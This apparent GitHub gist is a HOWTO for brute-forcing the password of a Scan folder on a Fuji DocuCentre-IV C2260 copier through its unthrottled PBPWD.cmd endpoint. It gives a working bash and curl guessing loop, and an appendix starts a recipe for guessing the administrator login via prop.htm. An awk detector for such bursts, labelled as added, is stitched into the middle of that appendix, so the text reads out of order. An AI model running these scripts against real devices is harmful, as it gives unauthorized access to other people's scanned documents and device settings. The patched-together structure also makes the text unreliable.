Last active April 20, 2018 18:31
HOWTO: brute force Fuji DocuCentre-IV C2260 Scan folder's password
This HOWTO describes how to brute force the "Scan" folder's password on a Fuji DocuCentre-IV C2260 Version
1.8 printer/Xerox copier.

The DocuCentre-IV C2260 runs a web server on port 80. Because the HTTP interface is not secured, one could also
mount a man-in-the-middle (MITM) attack. However, a MITM attack is not what we are discussing here. The
web application on port 80 has an interface (in the UI, under the Scan>Folder menu) to which multiple users deliver
their scanned documents. These folders are password protected. It turns out that access to such a folder can
be obtained with a simple HTTP POST command, and this command is not throttled upon access failure. Therefore, it
allows us to automate the authentication process and thus brute force the password.

Suppose the IP address of the web server is 192.168.1.42.
Suppose we want to brute force the folder with folder number '005' in the web UI.
Because a user has to enter the password manually on the printer's keypad when a document is scanned
into the folder, we further use the heuristic that the password is a short (less than or equal to 6 digits) number.

Here is the code to do so, run from a Linux bash shell.
# Start of code
function trypass {
    mypass=$1
    myfolder=$2
    machineip=$3
    # Here the '-m 10' option sets the timeout to 10 sec
    mycode=$(curl -m 10 -s -o /dev/null -w "%{http_code}\\n" \
        -d "PWD=${mypass}&SET=1&BOX=${myfolder}&ORD=DD" \
        -H "Content-Type: application/x-www-form-urlencoded" \
        -X POST "http://${machineip}/PBPWD.cmd")
    echo "${mycode}"
}

MYIP=192.168.1.42
for i in $(seq 99999);
do
    mycode=$(trypass "$i" 5 "$MYIP")
    # curl reports 000 when no HTTP response was received (e.g. timeout): retry
    while [ "$mycode" -eq 000 ]
    do
        sleep 10
        mycode=$(trypass "$i" 5 "$MYIP")
    done
    echo "$i: $mycode"
    if [ "$mycode" -eq 200 ]
    then break
    fi
done > folder_5.txt
# End of code
Inspect the content of folder_5.txt for the last entry/row. If password brute forcing succeeds, the last entry will
be of the form "<password>: 200".

Appendix:
Here is a recipe for brute forcing the administrator login through the 'prop.htm' interface.
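
Because the POST to PBPWD.cmd is not throttled, the guessing loop above shows up on the network as a dense run of
failed requests from one source. The following is an added example (not part of the original gist) of a detection
for that pattern. It assumes a reverse proxy or network sensor in front of the device that writes Common Log Format
lines; the function names, the sample log and the 403 failure status are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example, not part of the original gist.
# Assumptions: a reverse proxy or network sensor in front of the device writes
# Common Log Format lines, and any non-200 reply to POST /PBPWD.cmd is a
# failed password guess.

# Constructed sample log: addresses, times and the 403 status are made up.
sample_log() {
  cat <<'EOF'
192.168.1.20 - - [20/Apr/2018:17:58:10 +0000] "POST /PBPWD.cmd HTTP/1.1" 403 0
192.168.1.20 - - [20/Apr/2018:17:58:25 +0000] "POST /PBPWD.cmd HTTP/1.1" 200 512
192.168.1.77 - - [20/Apr/2018:18:00:01 +0000] "POST /PBPWD.cmd HTTP/1.1" 403 0
192.168.1.77 - - [20/Apr/2018:18:00:02 +0000] "POST /PBPWD.cmd HTTP/1.1" 403 0
192.168.1.77 - - [20/Apr/2018:18:00:03 +0000] "POST /PBPWD.cmd HTTP/1.1" 403 0
192.168.1.77 - - [20/Apr/2018:18:00:04 +0000] "POST /PBPWD.cmd HTTP/1.1" 403 0
192.168.1.77 - - [20/Apr/2018:18:00:05 +0000] "POST /PBPWD.cmd HTTP/1.1" 403 0
192.168.1.77 - - [20/Apr/2018:18:00:06 +0000] "POST /PBPWD.cmd HTTP/1.1" 403 0
192.168.1.77 - - [20/Apr/2018:18:00:07 +0000] "POST /PBPWD.cmd HTTP/1.1" 200 512
192.168.1.77 - - [20/Apr/2018:18:00:09 +0000] "GET /prop.htm HTTP/1.1" 401 0
EOF
}

# Usage: detect_pbpwd_bursts [LIMIT] < access.log
# Prints one line per source whose failed guesses in any single minute reach
# LIMIT (default 5), and whether a 200 followed the burst.
detect_pbpwd_bursts() {
  awk -v limit="${1:-5}" '
    $6 == "\"POST" && $7 == "/PBPWD.cmd" {
      src = $1
      minute = substr($4, 2, 17)            # dd/Mon/yyyy:HH:MM
      if ($9 != 200) {
        n = ++fails[src, minute]
        if (n > peak[src]) { peak[src] = n; when[src] = minute }
      } else if (peak[src] >= limit) {
        cracked[src] = 1                    # 200 seen after a burst
      }
    }
    END {
      for (src in peak)
        if (peak[src] >= limit)
          printf "%s peak=%d/min at %s success_after_burst=%s\n",
                 src, peak[src], when[src], ((src in cracked) ? "yes" : "no")
    }' | sort
}

sample_log | detect_pbpwd_bursts 5
```

A single mistyped password followed by a success (192.168.1.20 in the sample) stays below the limit and is not reported.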
# Start of code (bash script)
# Build the HTTP Basic credential: base64 of "username:password"
mylogin="username:password"
mybasicauth=$(echo -n "${mylogin}" | openssl base64)
curl -s -o /dev/null -w "%{http_code}\\n" -X GET http://192.168.1.188/prop.htm -H "Authorization: Basic $mybasicauth"
# End of code
The above script returns the HTTP status code (200 on success; 401 on failure).